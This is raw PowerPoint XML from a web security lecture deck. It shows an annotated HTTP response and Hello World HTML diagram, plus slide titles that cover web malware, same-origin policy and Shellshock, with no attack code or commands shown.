                <a:gd name="adj" fmla="val 7106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flat">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="127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HTTP/1.1 200 </a:t>
              </a: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OK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Date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: Tue, 14 Feb </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500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2012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Server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: Apache/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500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1.3.3.7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Last</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="15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-Modified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: Mon, 13 Feb </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500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2012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Content</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="15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-Length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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500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438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Set</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="15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-Cookie: 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..</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500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.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean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Content</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="1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-Type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: text/html; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0" err="1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charset</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="EFEED7"/>
                  </a:solidFill>
                  <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                  <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
                </a:rPr>
                <a:t>=UTF-8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21520" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5402461" y="4160119"/>
            <a:ext cx="2714625" cy="1884164"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7106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 w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="12700" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst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&lt;html&gt;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&lt;head&gt;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  &lt;title&gt; Hello World! &lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1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p</a:t>
            </a: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&gt; Hello World! &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1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p</a:t>
            </a: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  &lt;/body&gt;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500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EFEED7"/>
                </a:solidFill>
                <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21521" name="Picture 1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3414" y="2062758"/>
            <a:ext cx="589359" cy="58935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1522" name="Picture 1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02711" y="2152055"/>
            <a:ext cx="589359" cy="58935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1523" name="Picture 1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92008" y="2241352"/>
            <a:ext cx="589359" cy="58935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1524" name="Picture 2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81305" y="2330649"/>
            <a:ext cx="589359" cy="58935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1525" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7947422" y="2946797"/>
            <a:ext cx="0" cy="22324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miter lim="800000"/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="stealth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526" name="Picture 2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61672" y="5607844"/>
            <a:ext cx="589359" cy="58935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1527" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2821782" y="1569825"/>
            <a:ext cx="59261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Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21528" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3839766" y="1569825"/>
            <a:ext cx="287188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File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21529" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="1569825"/>
            <a:ext cx="1071582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HTTP version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>
            <a:off x="3062883" y="1772543"/>
            <a:ext cx="1117" cy="197570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1" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4027289" y="1772543"/>
            <a:ext cx="1117" cy="197570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2" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5098851" y="1772543"/>
            <a:ext cx="1117" cy="197570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3" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1714500" y="2105606"/>
            <a:ext cx="657976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Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21534" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1982391" y="2345160"/>
            <a:ext cx="660797" cy="142875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5" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="322586" y="4123715"/>
            <a:ext cx="1071582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HTTP version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21536" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="916410" y="4357688"/>
            <a:ext cx="202034" cy="107156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37" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2226841" y="4070137"/>
            <a:ext cx="94492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Status code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21538" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3424535" y="4213012"/>
            <a:ext cx="1195233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Reason phrase</a:t>
            </a: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 flipH="1">
            <a:off x="2249166" y="4273973"/>
            <a:ext cx="167432" cy="118318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2940100" y="4321969"/>
            <a:ext cx="392906" cy="142875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41" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4644554" y="4525551"/>
            <a:ext cx="657976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Headers</a:t>
            </a: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4314156" y="4750594"/>
            <a:ext cx="411881" cy="309191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43" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5505152" y="6326000"/>
            <a:ext cx="361346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Arial" pitchFamily="-84" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-84" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a: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 rot="10800000" flipH="1">
            <a:off x="5667003" y="6119068"/>
            <a:ext cx="94878" cy="202035"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:srgbClr val="40458C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45" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="623962" y="6409715"/>
            <a:ext cx="652604" cy="200055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-84" charset="0"/>
                <a:ea typeface="Tahoma" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="-84" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21546" name="AutoShape 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="771302" y="5545336"/>
            <a:ext cx="294680" cy="884039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="+- 0 10800 1001"/>
              <a:gd name="T1" fmla="*/ T0 w 20599"/>
              <a:gd name="T2" fmla="*/ 10800 h 21600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T1" y="T2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20599" h="21600">
                <a:moveTo>
                  <a:pt x="7419" y="21600"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4552" y="16818"/>
                  <a:pt x="1684" y="12036"/>
                  <a:pt x="830" y="8727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-25" y="5418"/>
                  <a:pt x="-1001" y="3200"/>
                  <a:pt x="2294" y="1745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5589" y="291"/>
                  <a:pt x="13094" y="145"/>
                  <a:pt x="20599" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:solidFill>
              <a:srgbClr val="40458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5389</TotalTime>
  <Words>2814</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>362</Paragraphs>
  <Slides>54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Lecture 7 – Web Security</vt:lpstr>
      <vt:lpstr>Today</vt:lpstr>
      <vt:lpstr>What is the Web?</vt:lpstr>
      <vt:lpstr>Web security:  two tales</vt:lpstr>
      <vt:lpstr>A historical perspective</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>HTTP protocol</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>Dynamic Web Pages </vt:lpstr>
      <vt:lpstr>DOM Tree: Document Object Model</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>Confining the Power of JavaScript Scripts </vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>￼The Ghost In The Browser Analysis of Web-based Malware ￼</vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>Detecting Malicious Websites </vt:lpstr>
      <vt:lpstr>Detecting Malicious Websites </vt:lpstr>
      <vt:lpstr>Processing Rate</vt:lpstr>
      <vt:lpstr>Content Control</vt:lpstr>
      <vt:lpstr>Web Server Security </vt:lpstr>
      <vt:lpstr>Advertising </vt:lpstr>
      <vt:lpstr>Third-Party Widgets </vt:lpstr>
      <vt:lpstr>Malware Trends and Statistics</vt:lpstr>
      <vt:lpstr>Exploiting Software</vt:lpstr>
      <vt:lpstr>Tricking the User</vt:lpstr>
      <vt:lpstr>Malware Classifications </vt:lpstr>
      <vt:lpstr>Remotely Linked Exploits </vt:lpstr>
      <vt:lpstr>Discussion </vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>Shellshock a.k.a. Bashdoor / Bash bug (Disclosed on Sep 24, 2014)</vt:lpstr>
      <vt:lpstr>Bash Shell</vt:lpstr>
      <vt:lpstr>Environment Variables</vt:lpstr>
      <vt:lpstr>Stored Bash Shell Script</vt:lpstr>
      <vt:lpstr>Hello World!  Example</vt:lpstr>
      <vt:lpstr>Dynamic Web Content Generation</vt:lpstr>
      <vt:lpstr>Common Gateway Interface (CGI)</vt:lpstr>
      <vt:lpstr>CGI Input</vt:lpstr>
      <vt:lpstr>CGI Output</vt:lpstr>
      <vt:lpstr>Example Script (Wikipedia)</vt:lpstr>
      <vt:lpstr>Windows Web server running cygwin</vt:lpstr>
      <vt:lpstr>Shellshock Vulnerability</vt:lpstr>
      <vt:lpstr>Cygwin Bash Shell Shows Vulnerability</vt:lpstr>
      <vt:lpstr>Alternatively</vt:lpstr>
      <vt:lpstr>Crux of the Problem</vt:lpstr>
      <vt:lpstr>Web Server Exploit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Bailey</dc:creator>
  <cp:lastModifiedBy>Michael</cp:lastModifiedBy>
  <cp:revision>124</cp:revision>
  <cp:lastPrinted>2012-09-18T16:35:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-02-04T19:34:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-23T13:31:16Z</dcterms:modified>
</cp:coreProperties>
</file>